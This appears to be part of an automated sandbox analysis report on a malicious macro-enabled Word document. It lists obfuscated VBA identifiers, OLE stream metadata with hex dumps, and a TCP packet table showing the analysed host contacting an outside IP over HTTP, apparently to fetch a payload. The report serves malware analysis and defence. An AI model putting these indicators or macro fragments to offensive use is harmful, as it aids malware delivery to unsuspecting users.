                                    cDhBGGFR:
                                    SJgnG,
                                    mEsdJFB
                                    jqLChB,
                                    zUuWGbKHy
                                    vQDCUDCB
                                    MidB$(BwbBAFi,
                                    LzBwHH:
                                    MidB$(DkDVE,
                                    gRLRHGC,
                                    IJmiCJ
                                    UBound(BwbBAFi)
                                    BzqWhVTIQ,
                                    UBound(PVoxdBG)
                                    fLrHD
                                    EQpkJ
                                    gRutBJw,
                                    MidB$(sRKFiF,
                                    BukCBE
                                    evivHCq
                                    JWFlPMBdA
                                    PVoxdBG(dxmcNDC)
                                    (IQtMAu
                                    afoME
                                    YuXlKu
                                    QkClFj
                                    MidB$(ZrdKv,
                                    sZNckH
                                    UBound(moLoGCFdJ)
                                    fufvMBxFB.Range
                                    wyNRtEF
                                    mhoxIuDG
                                    (emKogsJt
                                    QkClFj()
                                    pXYQI
                                    hpETwA
                                    jOsZcJgCh
                                    kkRMkYKwF:
                                    yteeIh(bPtpAAz)
                                    UBound(xIuBj)
                                    lckOJI
                                    CXFlxhCIJ
                                    emKogsJt
                                    GHdxC
                                    bLGZEYcz,
                                    kVqKGDIMx,
                                    szzfJDSJ
                                    (XzAMGG
                                    PgRZHO
                                    (fagdu
                                    VHaeE
                                    VB_Name
                                    (dbkQgsAA
                                    FYWwFXnmD
                                    iXqMIB
                                    QxJDiLDHH
                                    MidB$(YOGNBFEJJ,
                                    (dkffwCHGW
                                    WUTQAet
                                    SXiaV,
                                    iDdzAA
                                    limvmeCz
                                    PLgbDBG
                                    GTerTpDH
                                    kwlTHAH,
                                    EaHQHNPDJ
                                    mUibp.Range
                                    zAyhIWe:
                                    PgRZHO(fagdu)
                                    mwFcDF:
                                    Mid(Application.Name,
                                    VmouN
                                    tYjkQO(CxCcsO)
                                    UBound(YOGNBFEJJ)
                                    MidB$(PgRZHO,
                                    SbJQC
                                    iNtVAIDc
                                    dkffwCHGW,
                                    dkffwCHGW
                                    (jqLChB
                                    VXGInFA()
                                    jhPGFGFEE
                                    RvUuQGH
                                    PVoxdBG()
                                    DmEHG
                                    sRKFiF(oNAXGHF)
                                    rnekAzHd:
                                    IQtMAu
                                    SEDgPAAd
                                    MidB$(ifLwTt,
                                    aMdIG.Range
                                    VoGiD.Range
                                    UBound(AFprvHL)
                                    oNAXGHF,
                                    MidB$(DjGAF,
                                    DgoBQDE
                                    dmUsACgD,
                                    PSrcCvsEO()
                                    VHywBeoD()
                                    yESSyEi
                                    DkDVE(dbkQgsAA)
                                    OeKxDTJnB
                                    UBound(VXGInFA)
                                    moLoGCFdJ()
                                    sRKFiF
                                    HbTERWfG
                                    dxmcNDC,
                                    UBound(tYjkQO)
                                    (IXzyVV
                                    eUaictZE
                                    tJnnSICuC
                                    dIEzTDWJ
                                    "sadsaccc"
                                    "sasdsacc"
                                    (gRutBJw
                                    paWrAs,
                                    StGIEBvBr
                                    DObJX
                                    (QfiVIAehH
                                    (kvOjif
                                    VXGInFA(emKogsJt)
                                    gRLRHGC
                                    UBound(DkDVE)
                                    NmDEB
                                    UBound(PSrcCvsEO)
                                    (EJmBDY
                                    PVoxdBG
                                    SJlnAGABP
                                    (ruGLP
                                    ifLwTt()
                                    (BzqWhVTIQ
                                    UBound(QkClFj)
                                    FYWwFXnmD.Range
                                    zEMxFGC
                                    zAyhIWe
                                    zCOlH
                                    yJLUe
                                    fAEnDfCC
                                    UBound(onDpQWW)
                                    TORFFDHP
                                    mUibp
                                    sswIGoWgh
                                    ELodJ
                                    MidB$(FaeuQIDH,
                                    Word.Paragraph
                                    iezxKGCjf,
                                    jqLChB
                                    (CxCcsO
                                    FaeuQIDH()
                                    DaucBFEHV
                                    bLGZEYcz
                                    pcKfwB
                                    LvygECNI
                                    KTfCJ
                                    DaucBFEHV.Range
                                    RLhdX
                                    ifLwTt
                                    zQEvCNI
                                    wjUEXtp
                                    Content
                                    tuwnUlI,
                                    BukCBE(SJgnG)
                                    UBound(DjGAF)
                                    kkRMkYKwF
                                    MidB$(AFprvHL,
                                    BwbBAFi
                                    kvOjif
                                    CmglGAD
                                    foEzCEG,
                                    MidB$(xIuBj,
                                    (oofPFJE
                                    mwFcDF
                                    ehgssJrG
                                    PSrcCvsEO(bLGZEYcz)
                                    RnNWIqm
                                    sHgJaG
                                    jfHHHlCG
                                    UBound(yteeIh)
                                    oofPFJE,
                                    IQtMAu,
                                    vIKvGtHY
                                    hUYqA,
                                    VXGInFA
                                    (kwlTHAH
                                    kkPsepvID
                                    onDpQWW
                                    oLvRsDgW
                                    jfHHHlCG:
                                    sRKFiF()
                                    gNPBGhAIB
                                    IBVrh
                                    dbkQgsAA
                                    MidB$(BukCBE,
                                    FzldATHyG
                                    woJbJABu
                                    AFprvHL()
                                    zMbQG
                                    vQDCUDCB:
                                    MidB$(moLoGCFdJ,
                                    FaeuQIDH(sHgJaG)
                                    FaeuQIDH
                                    lPkcE
                                    (SJgnG
                                    EJmBDY,
                                    oYpISX:
                                    kUGXaZ
                                    CxCcsO
                                    UBound(PgRZHO)
                                    QxJDiLDHH:
                                    bSozuu
                                    MidB$(VXGInFA,
                                    JqRPV
                                    (CXFlxhCIJ
                                    Len(skuwd))
                                    (oNAXGHF
                                    ZQoRFxD
                                    (foEzCEG
                                    NmDEB:
                                    (GHdxC
                                    ZrdKv(SXiaV)
                                    dbkQgsAA,
                                    yteeIh
                                    bPtpAAz
                                    sCAOEB
                                    QfiVIAehH
                                    EaHQHNPDJ:
                                    sZNckH:
                                    (SXiaV
                                    hOPLcHJ.Range
                                    (dxmcNDC
                                    (fLrHD
                                    gQeIGU.Range
                                    UBound(ZrdKv)
                                    HbTERWfG.Range
                                    ZrdKv()
                                    SDQTYAih
                                    nljDdEKC
                                    bNIqI
                                    VTAHFoBxb
                                    (YuXlKu
                                    xUDGCFC
                                    CazGpHEDF
                                    MidB$(QkClFj,
                                    kVqKGDIMx
                                    zsUxsFG
                                    (bLGZEYcz
                                    oYpISX
                                    BukCBE()
                                    Mid(skuwd,
                                    DObJX.Range
                                    KxJIEXq
                                    KhPdASzO
                                    nyozdGEMG
                                    QkClFj(kwlTHAH)
                                    (VmouN
                                    UBound(BukCBE)
                                    AFprvHL
                                    hUYqA
                                    MidB$(VHywBeoD,
                                    zEMxFGC.Range
                                    Error
                                    DjGAF()
                                    WhXxZBCFx
                                    HrGdJP
                                    pEAiGKqHg
                                    Attribute
                                    SuvbRJTD
                                    CWWHXGG
                                    yJLUe.Range
                                    fufvMBxFB
                                    (kkPsepvID
                                    kwlTHAH
                                    (dmUsACgD
                                    VmouN,
                                    LzBwHH
                                    CNURGFVBp
                                    hBXXCY
                                    bSozuu.Range
                                    (tuwnUlI
                                    hOPLcHJ
                                    Function
                                    MidB$(PVoxdBG,
                                    xIuBj
                                    YuXlKu,
                                    bPtpAAz,
                                    tYjkQO()
                                    ZrdKv
                                    QfiVIAehH,
                                    fagdu,
                                    (gRLRHGC
                                    moLoGCFdJ
                                    YMyjEGOO
                                    YwvvF
                                    XgCNAOJ
                                    DkDVE
                                    nnjasd
                                    mUryG
                                    XzAMGG,
                                    ArvQXC
                                    rIkmCk
                                    iqbgCC
                                    (sHgJaG
                                    BMCxVes
                                    skuwd
                                    (hUYqA
                                    VBA Code

                                    Streams

                                    Stream Path: \x1CompObj, File Type: data, Stream Size: 146
                                    General
                                    Stream Path:\x1CompObj
                                    File Type:data
                                    Stream Size:146
                                    Entropy:4.00187355764
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q @ . . . . . > . : . C . < . 5 . = . B . . M . i . c . r . o . s . o . f . t . . W . o . r . d . . 9 . 7 . - . 2 . 0 . 0 . 3 . . . . . . . . . . .
                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 40 00 00 00 14 04 3e 04 3a 04 43 04 3c 04 35 04 3d 04 42 04 20 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 57 00 6f 00 72 00 64 00 20 00 39 00 37 00 2d 00
                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.279952994103
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 552
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:552
                                    Entropy:4.11686047225
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 f8 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 68 01 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00
                                    Stream Path: 1Table, File Type: data, Stream Size: 6847
                                    General
                                    Stream Path:1Table
                                    File Type:data
                                    Stream Size:6847
                                    Entropy:6.03173557377
                                    Base64 Encoded:True
                                    Data ASCII:j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                    Data Raw:6a 04 11 00 12 00 01 00 0b 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                    Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 516
                                    General
                                    Stream Path:Macros/PROJECT
                                    File Type:ASCII text, with CRLF line terminators
                                    Stream Size:516
                                    Entropy:5.47836240591
                                    Base64 Encoded:True
                                    Data ASCII:I D = " { 4 A 0 5 3 0 A 6 - D A 4 7 - 4 F D A - 9 2 B 3 - 4 1 B 1 D 5 0 9 B B D 4 } " . . D o c u m e n t = N r e _ 1 3 r _ _ v 1 m e a b h r 2 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = T w w e j h 0 3 4 u 3 2 e b q . . M o d u l e = U v e d 9 u 3 2 0 l y e n . . E x e N a m e 3 2 = " U f f 6 s j 7 2 n x 3 9 8 f 7 v h u " . . N a m e = " D D " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 2 0 0 E 7 6 2 6 A 6 6 6 A 6 6 6 A 6 6 6 A 6 6 "
                                    Data Raw:49 44 3d 22 7b 34 41 30 35 33 30 41 36 2d 44 41 34 37 2d 34 46 44 41 2d 39 32 42 33 2d 34 31 42 31 44 35 30 39 42 42 44 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4e 72 65 5f 31 33 72 5f 5f 76 31 6d 65 61 62 68 72 32 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 54 77 77 65 6a 68 30 33 34 75 33 32 65 62 71 0d 0a 4d 6f 64 75 6c 65 3d 55 76 65 64 39 75 33 32 30 6c 79 65
                                    Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149
                                    General
                                    Stream Path:Macros/PROJECTwm
                                    File Type:data
                                    Stream Size:149
                                    Entropy:3.67538593101
                                    Base64 Encoded:False
                                    Data ASCII:N r e _ 1 3 r _ _ v 1 m e a b h r 2 . N . r . e . _ . 1 . 3 . r . _ . _ . v . 1 . m . e . a . b . h . r . 2 . . . T w w e j h 0 3 4 u 3 2 e b q . T . w . w . e . j . h . 0 . 3 . 4 . u . 3 . 2 . e . b . q . . . U v e d 9 u 3 2 0 l y e n . U . v . e . d . 9 . u . 3 . 2 . 0 . l . y . e . n . . . . .
                                    Data Raw:4e 72 65 5f 31 33 72 5f 5f 76 31 6d 65 61 62 68 72 32 00 4e 00 72 00 65 00 5f 00 31 00 33 00 72 00 5f 00 5f 00 76 00 31 00 6d 00 65 00 61 00 62 00 68 00 72 00 32 00 00 00 54 77 77 65 6a 68 30 33 34 75 33 32 65 62 71 00 54 00 77 00 77 00 65 00 6a 00 68 00 30 00 33 00 34 00 75 00 33 00 32 00 65 00 62 00 71 00 00 00 55 76 65 64 39 75 33 32 30 6c 79 65 6e 00 55 00 76 00 65 00 64 00 39
                                    Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 6003
                                    General
                                    Stream Path:Macros/VBA/_VBA_PROJECT
                                    File Type:data
                                    Stream Size:6003
                                    Entropy:5.68411443527
                                    Base64 Encoded:False
                                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
                                    Data Raw:cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00
                                    Stream Path: Macros/VBA/dir, File Type: Tower32/800 68020 not stripped - version 18435, Stream Size: 676
                                    General
                                    Stream Path:Macros/VBA/dir
                                    File Type:Tower32/800 68020 not stripped - version 18435
                                    Stream Size:676
                                    Entropy:6.39115166959
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . D 2 . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . < . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . . * \\ C . . . . . . . . a . . . ! O f f i
                                    Data Raw:01 a0 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 44 32 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 3c ff fa 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d
                                    Stream Path: WordDocument, File Type: data, Stream Size: 112766
                                    General
                                    Stream Path:WordDocument
                                    File Type:data
                                    Stream Size:112766
                                    Entropy:7.32176415337
                                    Base64 Encoded:True
                                    Data ASCII:. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . [ . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . b . . . b . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:ec a5 c1 00 5f c0 09 04 00 00 f0 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 bd 5b 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 7e b8 01 00 62 7f 00 00 62 7f 00 00 bd 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00
                                    Stream Path: word, File Type: data, Stream Size: 1122
                                    General
                                    Stream Path:word
                                    File Type:data
                                    Stream Size:1122
                                    Entropy:7.81126798031
                                    Base64 Encoded:False
                                    Data ASCII:. . $ . . 7 { . . O . . . : . L 6 d M f d 4 . . Z . . 8 . . . M . . / { y C K ) . G . . T . . . . . . . . . . . q : L _ B . 1 | . . . . 0 . . . $ . . . . ^ . . . * . . 3 . . T S h . . . . { . z | . . . . . . , . . . . T 5 . . 2 . . y . H G . . . . . . . Z , Y . a . . W . M . g . . . . . 3 . j . * c J . 4 B . ! T . Q B k J . < G . > . . . . . 6 . i / . . . . . M / . . 0 - . ) 6 ` 8 . $ A . . . . _ . . . @ . . . . . . > . . z . . . . - . . . . . . . . . X . 9 ` . 5 ! . [ . 1 N . . . . . . . $ b # x . T . .
                                    Data Raw:10 ea 24 95 1f 37 7b 80 e5 4f 18 ac fd 3a ac 4c 36 64 4d 66 64 34 d7 b2 5a d2 d7 38 fb b4 d2 4d ad 07 2f 7b 79 43 4b 29 be 47 ac f8 54 be b8 17 0d ef 20 9f c9 bb b2 dc 13 71 3a 4c 5f 42 84 31 7c ca fe f6 0b 30 d3 f3 19 24 a8 1c 87 de 5e 9b 1a c0 2a 0b 94 33 83 f1 54 53 68 07 08 ff c9 7b c3 7a 7c 89 bf c2 0c dd 1c 2c 85 a5 13 95 54 35 13 9e 32 9e 18 79 9d 48 47 0d a1 b7 c8 cb ea 1a

                                    Network Behavior

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 25, 2021 11:20:43.706973076 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:43.852220058 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:43.852329016 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:43.855108976 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.002566099 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.005980968 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006011009 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006023884 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006046057 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006067038 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006088018 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006113052 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006129980 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006150961 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006170988 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006186008 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006186962 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.006206036 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006222963 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006226063 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.006242990 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.006243944 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006269932 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.006302118 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.147989988 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148052931 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148087978 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148104906 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148144007 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148183107 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148344994 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.148384094 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.148391008 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.148873091 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148929119 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148960114 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.148986101 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149024963 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149025917 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149066925 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149091005 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149106026 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149143934 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149168968 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149174929 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149215937 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149246931 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149283886 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149286985 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149311066 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149348021 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149350882 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149425030 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149481058 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149496078 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149511099 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.149548054 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.149549961 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.150108099 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.150913000 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.150950909 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.150991917 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.151057959 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.151123047 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.291057110 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291121006 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291148901 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291186094 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291325092 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.291904926 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291934967 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291973114 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.291985989 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292011976 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292047024 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292059898 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292068005 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292103052 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292119026 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292129993 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292155981 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292170048 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292207956 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292232037 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292264938 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292484045 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292807102 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292831898 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292857885 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292896032 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292932034 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292958975 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.292969942 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.292984009 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.293009043 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.293031931 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.293045044 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.293060064 CET4916580192.168.2.22217.144.106.11
                                    Jan 25, 2021 11:20:44.293087006 CET8049165217.144.106.11192.168.2.22
                                    Jan 25, 2021 11:20:44.293124914 CET8049165217.144.106.11192.168.2.22

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
